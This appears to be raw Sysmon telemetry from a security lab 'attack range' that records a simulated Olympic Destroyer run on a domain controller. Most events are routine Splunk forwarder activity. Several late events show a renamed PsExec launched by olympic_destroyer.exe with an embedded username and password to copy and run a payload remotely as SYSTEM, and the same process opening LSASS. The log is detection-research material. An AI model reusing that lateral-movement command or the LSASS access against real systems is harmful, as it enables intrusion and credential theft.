Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000294594Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:03:03.973{C8EA50B7-F130-6215-3000-000000003802}25121124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{C8EA50B7-1467-6216-9A06-000000003802}2216C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000294593Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:03:03.972{C8EA50B7-1467-6216-9A06-000000003802}2216C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{C8EA50B7-F11D-6215-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{C8EA50B7-F130-6215-3000-000000003802}2512C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000294592Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:03:03.077{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8C9D2E7EE07C0CF666328DA141EBC427,SHA256=3B3D99F7BA94A163C0922FFA1AC2EBED7912EA70E8235E90D65FF06D6475FCE4,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000218864Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:03:02.576{4F8D34B0-F12B-6215-5B00-000000003902}3916C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal51485-false10.0.1.12-8000- 23542300x8000000000000000218863Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:03:04.863{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=5C7A58BEBB8405EB6F8DDEB2781F08C1,SHA256=B33DC8FA29F0883108EFB57F2E553CF2DD68EF62FEF1DC27B82AA4CD75470C91,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000218862Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:03:04.550{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5F8C36B4002AF210747050F8636305EF,SHA256=8CD85C99571563644DBC392567BEFB6335995231020C675AB7F16780D1228C0D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000294601Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:03:04.093{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BB93B5B0DE9A40C62C344226BD084A27,SHA256=503199E4C77D56387A6B0958894D256580D2B0D517978A0704FFB03A12163260,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000218865Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:03:05.566{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0BF4EB87575F0A2876B33A4795BB0DB7,SHA256=C3B7AF357ADC48E7F93F1353E571A8E82F421DAEC5A6EEB3948A1118C8A879CA,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000294604Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:03:03.297{C8EA50B7-F11D-6215-0B00-000000003802}628C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsetrue0:0:0:0:0:0:0:1win-dc-tcontreras-attack-range-173.attackrange.local49155-true0:0:0:0:0:0:0:1win-dc-tcontreras-attack-range-173.attackrange.local389ldap 354300x8000000000000000294603Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:03:03.297{C8EA50B7-F130-6215-2C00-000000003802}2420C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exeNT AUTHORITY\SYSTEMtcptruetrue0:0:0:0:0:0:0:1win-dc-tcontreras-attack-range-173.attackrange.local49155-true0:0:0:0:0:0:0:1win-dc-tcontreras-attack-range-173.attackrange.local389ldap 23542300x8000000000000000294602Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:03:05.095{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4C12C4F9C6EECEC5379CDB77C71BC2BC,SHA256=39360D2C63BCF54D553EE9F4C25F28F76BFB887CFADDD542EF83149F68B92DFD,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000218867Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:03:04.982{4F8D34B0-F11C-6215-1000-000000003902}940C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse187.141.52.101customer-187-141-52-101-sta.uninet-ide.com.mx59721-false10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal3389ms-wbt-server 23542300x8000000000000000218866Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:03:06.597{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=86CAA439433B2558DB5C2BD31B3AAC5D,SHA256=920CE4684370EBDC982D2061F3362C64A4DE16325EEC9E668ECCD70DC87797F8,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000294606Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:03:04.587{C8EA50B7-F13C-6215-6E00-000000003802}3696C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local49156-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000294605Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:03:06.110{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=064060368365F99A5E24576EA56E74F6,SHA256=DF8D21F1D05956021CC4A591790512EB1A24F09FE74A17E9B66DA41EC0327686,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000218869Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:03:07.785{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4B4BD15B8FA1AAE51A5B0939B4A872DF,SHA256=2FE2EE3813861DA5DFA273095D907572C62DDBAE3B6F183FA03775C39EA7D879,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000294625Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:03:07.777{C8EA50B7-11AA-6216-1605-000000003802}2228ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\yap1cmsg.default-release\datareporting\glean\db\data.safe.binMD5=3D53C5C62D79C51E67B798B13F17B277,SHA256=C50FF199D441CBA11D87CF36FEE08BC5623B1AA80EF4D11E4EBAC93BB86A54D5,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000294624Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:03:07.656{C8EA50B7-F11D-6215-0B00-000000003802}628824C:\Windows\system32\lsass.exe{C8EA50B7-146B-6216-9B06-000000003802}1804C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\lsasrv.dll+26327|C:\Windows\system32\lsasrv.dll+2746d|C:\Windows\system32\lsasrv.dll+261a5|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+5460b|C:\Windows\System32\RPCRT4.dll+52cea|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000294623Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:03:07.656{C8EA50B7-F11D-6215-0B00-000000003802}628824C:\Windows\system32\lsass.exe{C8EA50B7-146B-6216-9B06-000000003802}1804C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\System32\RPCRT4.dll+2be8f|C:\Windows\system32\lsasrv.dll+260ed|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+5460b|C:\Windows\System32\RPCRT4.dll+52cea|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 13241300x8000000000000000294622Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.localAlert,Sysinternals Tool UsedSetValue2022-02-23 11:03:07.594{C8EA50B7-146B-6216-9B06-000000003802}1804C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exeHKU\S-1-5-21-1032146228-2128790581-2941542908-500\SOFTWARE\Sysinternals\PsExec\EulaAcceptedDWORD (0x00000001) 10341000x8000000000000000294621Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:03:07.457{C8EA50B7-F11F-6215-1000-000000003802}364764C:\Windows\system32\svchost.exe{C8EA50B7-146B-6216-9C06-000000003802}6536C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000294620Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:03:07.441{C8EA50B7-F11F-6215-1000-000000003802}3641376C:\Windows\system32\svchost.exe{C8EA50B7-146B-6216-9C06-000000003802}6536C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000294619Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:03:07.441{C8EA50B7-146B-6216-9C06-000000003802}65361244C:\Windows\system32\conhost.exe{C8EA50B7-146B-6216-9B06-000000003802}1804C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000294618Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:03:07.325{C8EA50B7-F2AA-6215-B100-000000003802}22442592C:\Windows\system32\csrss.exe{C8EA50B7-146B-6216-9C06-000000003802}6536C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000294617Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:03:07.310{C8EA50B7-F11F-6215-1400-000000003802}10483464C:\Windows\System32\svchost.exe{C8EA50B7-146B-6216-9C06-000000003802}6536C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\pcasvc.dll+ac96|c:\windows\system32\pcasvc.dll+aaf6|c:\windows\system32\pcasvc.dll+aab8|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000294616Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:03:07.178{C8EA50B7-F2AA-6215-B100-000000003802}22444896C:\Windows\system32\csrss.exe{C8EA50B7-146B-6216-9B06-000000003802}1804C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000294615Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:03:07.157{C8EA50B7-F11F-6215-0C00-000000003802}8286016C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000294614Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:03:07.157{C8EA50B7-F11F-6215-0C00-000000003802}8286016C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000294613Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:03:07.157{C8EA50B7-F11F-6215-0C00-000000003802}8286016C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000294612Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:03:07.157{C8EA50B7-F11F-6215-0C00-000000003802}8286016C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000294611Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:03:07.157{C8EA50B7-12E6-6216-4B05-000000003802}67924840C:\Temp\olympic_destroyer.exe{C8EA50B7-146B-6216-9B06-000000003802}1804C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9278(wow64)|C:\Windows\System32\KERNELBASE.dll+15a0bb(wow64)|C:\Windows\System32\KERNELBASE.dll+159d6c(wow64)|C:\Temp\olympic_destroyer.exe+469a|C:\Temp\olympic_destroyer.exe+47ec|C:\Temp\olympic_destroyer.exe+4a2f|C:\Temp\olympic_destroyer.exe+5ac1|C:\Temp\olympic_destroyer.exe+84b3|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 154100x8000000000000000294610Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:03:07.163{C8EA50B7-146B-6216-9B06-000000003802}1804C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe2.2Execute processes remotelySysinternals PsExecSysinternals - www.sysinternals.compsexec.cC:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe \\10.0.1.1 -u "WW930\a593309" -p "Provoka426446" -accepteula -d -s -c -f "C:\Users\ADMINI~1\AppData\Local\Temp\_pwv.exe"C:\Temp\ATTACKRANGE\Administrator{C8EA50B7-F2AC-6215-B31E-0B0000000000}0xb1eb32HighMD5=27304B246C7D5B4E149124D5F93C5B01,SHA256=3337E3875B05E0BFBA69AB926532E3F179E8CFBF162EBB60CE58A0281437A7EF,IMPHASH=C1E59519B5E5D84AF07AFA6F5A8625F1{C8EA50B7-12E6-6216-4B05-000000003802}6792C:\Temp\olympic_destroyer.exe"C:\Temp\olympic_destroyer.exe" 10341000x8000000000000000294609Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:03:07.157{C8EA50B7-F11F-6215-1400-000000003802}10483464C:\Windows\System32\svchost.exe{C8EA50B7-146B-6216-9B06-000000003802}1804C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\pcasvc.dll+ac96|c:\windows\system32\pcasvc.dll+aaf6|c:\windows\system32\pcasvc.dll+aab8|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 534500x8000000000000000294608Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:03:07.157{C8EA50B7-1454-6216-9406-000000003802}5812C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe 23542300x8000000000000000294607Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:03:07.125{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1A1DA65CC5C9F968ED5EDF88C3BA07E8,SHA256=6D517E7A6FF8BD1296146F4E2328E00A64A72FD63FDE55B18A0C58166ABB996E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000218868Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:03:07.769{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=E909C5EE55B6FFBC270315CDAFDB1B7A,SHA256=7D6CFB1CF894CB762358E432B8C044562B0C0BB53D513CB4E80401C4F48D3A26,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000218870Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:03:08.785{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=14527FE12B5A451FF0B4E4E45F2EDD44,SHA256=5409E1B9694CF87558150001A10697025F93A74F006FF9DFA546A2BA83F4B2FF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000294626Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:03:08.156{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2813D74523ABE49D67BAFB03B19A22E4,SHA256=7E4B262B931DDF29EE49DC25F73061FE1146FAF8B3CD610D7208A61C87203A30,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000218871Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:03:09.816{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=661020C853DE6E05EC88BD9BA51EDBD3,SHA256=2E821AC4432FBBB45158B271EFB12549551153748E581D63EF848A16A782FC2A,IMPHASH=00000000000000000000000000000000falsetrue 13241300x8000000000000000294628Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-SetValue2022-02-23 11:03:09.456{C8EA50B7-F11F-6215-1200-000000003802}8C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\W32Time\Config\LastKnownGoodTimeQWORD (0x01d828a4-0xf13e36d4) 